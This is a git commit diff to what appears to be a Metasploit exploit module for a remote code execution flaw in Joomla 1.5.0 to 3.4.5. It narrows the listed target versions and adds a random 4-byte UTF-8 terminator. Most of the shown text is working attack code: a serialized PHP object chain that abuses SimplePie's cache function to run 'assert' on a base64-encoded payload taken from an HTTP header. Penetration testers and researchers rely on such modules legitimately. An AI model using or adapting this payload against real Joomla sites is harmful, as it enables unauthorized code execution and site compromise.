add random terminator and clarify target

bug/bundler_fix
Christian Mehlmauer 2015-12-17 00:08:52 +01:00
parent 08d0ffd709
commit 8c43ecbfaf
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
1 changed files with 11 additions and 5 deletions

View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Joomla < 3.4.6', {}]],
'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],
'DisclosureDate' => 'Dec 14 2015',
'DefaultTarget' => 0)
)
@ -140,13 +140,19 @@ class Metasploit3 < Msf::Exploit::Remote
Exploit::CheckCode::Safe
end
# gets a random 4 byte UTF-8 character
def get_terminator
# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
[rand(0x10000..0x10ffff)].pack('U*')
end
def get_payload(header_name)
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
pre_pay = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
post = "\xF0\x9D\x8C\x86"
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
post_pay = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
t1000 = get_terminator
return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{t1000}"
end
def print_status(msg='')